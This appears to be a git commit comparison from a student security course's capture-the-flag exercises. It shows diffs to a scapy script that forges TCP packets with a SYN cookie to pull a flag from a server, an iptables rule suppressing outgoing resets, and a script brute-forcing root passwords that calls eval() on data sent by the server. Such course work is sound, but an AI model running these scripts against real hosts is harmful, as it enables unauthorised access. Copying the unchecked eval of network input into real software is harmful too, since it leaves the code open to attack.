Compare commits
2 Commits
fd8082a740
...
ca0fd21d73
| Author | SHA1 | Date | |
|---|---|---|---|
| ca0fd21d73 | |||
| 7f126ce5f8 |
@ -14,8 +14,8 @@ from random import randrange
|
|||||||
log = logging.getLogger(__name__)
|
log = logging.getLogger(__name__)
|
||||||
TCP_CLIENTS = {} # ((IP, port) -> [sent_packets])
|
TCP_CLIENTS = {} # ((IP, port) -> [sent_packets])
|
||||||
|
|
||||||
# SERVER_IP = '131.159.15.68' # don't use the domain name in this case
|
SERVER_IP = '131.159.15.68' # don't use the domain name in this case
|
||||||
SERVER_IP = '192.168.1.4' # don't use the domain name in this case
|
# SERVER_IP = '192.168.1.4' # don't use the domain name in this case
|
||||||
SERVER_PORT = 20102
|
SERVER_PORT = 20102
|
||||||
COOKIE_SECRET = 'TASTY_COOKIES123'
|
COOKIE_SECRET = 'TASTY_COOKIES123'
|
||||||
INITIAL_SEQ = 1337
|
INITIAL_SEQ = 1337
|
||||||
@ -27,12 +27,18 @@ def generate_syn_cookie(client_ip: str, client_port: int, server_secret: str):
|
|||||||
|
|
||||||
def handle_packet(packet: Packet):
|
def handle_packet(packet: Packet):
|
||||||
# TODO: please implement me!
|
# TODO: please implement me!
|
||||||
|
packet.show()
|
||||||
if packet.haslayer(TCP) and packet[TCP].sport == SERVER_PORT and packet[TCP].dport == SRC_PORT and packet[TCP].flags == "SA":
|
if packet.haslayer(TCP) and packet[TCP].sport == SERVER_PORT and packet[TCP].dport == SRC_PORT and packet[TCP].flags == "SA":
|
||||||
|
print("received SA packett")
|
||||||
ip = IP(dst=SERVER_IP)
|
ip = IP(dst=SERVER_IP)
|
||||||
syn = TCP(sport=SRC_PORT, dport=SERVER_PORT, flags='SA', seq=COOKIE, ack=packet[TCP].seq)
|
syn = TCP(sport=SRC_PORT, dport=SERVER_PORT, flags='SA', seq=COOKIE, ack=packet[TCP].seq)
|
||||||
resp = (ip / syn)
|
resp = (ip / syn)
|
||||||
send(resp)
|
send(resp)
|
||||||
packet.show()
|
if packet.haslayer(TCP) and packet[TCP].sport == SERVER_PORT and packet[TCP].dport == SRC_PORT and packet[TCP].flags == "A":
|
||||||
|
print("received acknowledgement")
|
||||||
|
payload = bytes(packet[TCP].payload).decode(errors='ignore')
|
||||||
|
print("Extracted flag:", payload) # This should print "hello world"
|
||||||
|
|
||||||
|
|
||||||
# Function to start the packet sniffing
|
# Function to start the packet sniffing
|
||||||
def start_sniffing():
|
def start_sniffing():
|
||||||
|
|||||||
1
week02/easy/stop_autot_reset.sh
Normal file
1
week02/easy/stop_autot_reset.sh
Normal file
@ -0,0 +1 @@
|
|||||||
|
sudo iptables-legacy -A OUTPUT -p tcp -d 131.159.15.68 --tcp-flags RST RST -j DROP
|
||||||
@ -6,27 +6,25 @@ PORT = 64984 # TODO
|
|||||||
|
|
||||||
def get_flag():
|
def get_flag():
|
||||||
for i in range(100):
|
for i in range(100):
|
||||||
time.sleep(2)
|
|
||||||
credentials = "root,Password"+str("%02d" % i)
|
credentials = "root,Password"+str("%02d" % i)
|
||||||
print(credentials)
|
|
||||||
try:
|
try:
|
||||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||||
s.connect((HOST, PORT))
|
s.connect((HOST, PORT))
|
||||||
sf = s.makefile('rw') # we use a file abstraction for the sockets
|
sf = s.makefile('rw') # we use a file abstraction for the sockets
|
||||||
print(sf.readline().rstrip('\n'))
|
tmp = sf.readline().rstrip('\n')
|
||||||
sf.write("{}\n".format(credentials))
|
sf.write("{}\n".format(credentials))
|
||||||
sf.flush()
|
sf.flush()
|
||||||
data = sf.readline().rstrip('\n')
|
data = sf.readline().rstrip('\n')
|
||||||
resp = eval(data)
|
resp = eval(data)
|
||||||
sf.write("{}\n".format(resp))
|
sf.write("{}\n".format(resp))
|
||||||
sf.flush()
|
sf.flush()
|
||||||
result = sf.readline().rstrip('\n')
|
ans = sf.readline().rstrip('\n')
|
||||||
if "login" in result:
|
if "login" in ans:
|
||||||
print(sf.readline().rstrip('\n'))
|
res = sf.readline().rstrip('\n')
|
||||||
break
|
return res
|
||||||
except:
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
get_flag()
|
print(get_flag())
|
||||||
Reference in New Issue
Block a user